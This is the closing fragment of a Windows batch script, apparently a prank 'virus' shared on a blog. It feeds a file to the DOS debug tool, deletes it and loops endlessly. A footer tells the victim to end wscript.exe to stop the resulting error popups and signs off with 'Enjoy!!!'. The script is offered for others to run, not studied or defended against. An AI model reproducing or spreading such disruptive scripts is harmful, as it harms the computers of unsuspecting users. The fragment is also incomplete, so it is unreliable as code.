debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^ posted by http://gauravmahapatra.blogspot.in/